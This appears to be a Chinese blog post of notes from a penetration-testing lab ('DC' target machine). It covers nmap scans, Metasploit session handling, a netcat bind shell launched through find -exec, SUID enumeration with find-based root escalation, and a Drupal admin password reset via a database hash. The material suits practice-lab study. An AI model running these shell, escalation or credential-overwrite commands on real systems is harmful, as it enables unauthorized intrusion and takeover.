dc靶机渗透

103 阅读3分钟

携手创作,共同成长!这是我参与「掘金日新计划 · 8 月更文挑战」的第5天,点击查看活动详情 ip扫描内网存活主机的方法

局域网探测:arp-scan -l   #需要root权限执行

nmap -sP 192.168.0.1/24

扫描IP开放端口的方法

nmap -A -p1-65535 -T4 IP

扫扫描该网段的存活主机和开放的IP

nmap 192.168.144.0/24

meterpreter建立shell连接 先输入shell再输入方法一

方法一:

shell #权限,不是本地,是http链接,需要一个持久链接,反弹一个交互shell

python -c "import pty;pty.spawn('/bin/bash')"

方法二:

find /var/www/test -exec nc -lvp 9999 -e /bin/sh ;

nc 192.168.0.119 999

退出交互式shell exit

MSF基本操作使用

我们要想从 meterpreter 退出到MSF框架,输入:background

要想不适用这个EXP就用back退出

010225628470.png

输入: sessions  -l       查看我们获得的shell,前面有id

输入: session  -i  1 

set exitonsession false  可以让建立监听的端口继续保持侦听。可以接受多个session  

exploit -j  #后台监听

clipboard.png

  即可切换到id为1的shell

上传文件 upload 本地文件目录 远程文件目录

Linux基本操作

Linux显示当前所在目录命令:pwd

Linux输出文件的内容:cat 文件名

Linux more命令:

Linux more 命令类似 cat ,不过会以一页一页的形式显示,更方便使用者逐页阅读,而最基本的指令就是按空白键(space)就往下一页显示,按 b 键就会往回(back)一页显示,而且还有搜寻字串的功能(与 vi 相似),使用中的说明文件,请按 h 

q退出more

searchsploit命令:寻找exploit详细信息

更新searchsploit -u

/etc/passwd 用户数据库,其中的域给出了用户名、真实姓名、家目录、加密的口令和用户的其他信息.

查看具有root权限的命令这三条都可以查询

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb { }

find命令:-exec: find命令对匹配的文件执行该参数所给出的shell命令。相应命令的形式为’command’ { } ;,注意{ }和\;之间的空格。

find text -exec "whoami" ;

find / -name 666 -exec "/bin/sh" ;

bin/sh的意思是是指此脚本使用/bin/sh来解释执行

find是root权限,用root创建的bin/sh也是root权限

touch命令 如果没有这个文件会自动创建这个名字的文件

find提权就是利用find是root权限 用exec直接把/bin/sh运行到touch创建的文件里执行

Mysql基本操作

MySQL常用语句一、连接MySQL格式:mysql-h主机地址-u用户名-p(p后面不要加用户密码他会自动提示输入,加上就会报错)

退出mysql : exit;

update 表名 set 字段="" where 字段=''

(where后面是限制条件)

Drupal重置密码:

方法二:这是drupal提供的最原生的方法

在windows下,打开命令行客户端(cmd),切换到Drupal7项目所在的目录,敲入以下命令:

php scripts/password-hash.sh admin

输出:

password: admin                 hash: SSDMtruNEVmqWoqhlPwTlnFzwyBRFgQwXUfppe9pW1RqqXlMy97tzA

然后到数据库中,查users表,找到对应的用户名,修改密码,将上述的hash值复制到密码字段,保存即可。

Drupal的默认配置文件为  /var/www/sites/default/settings.php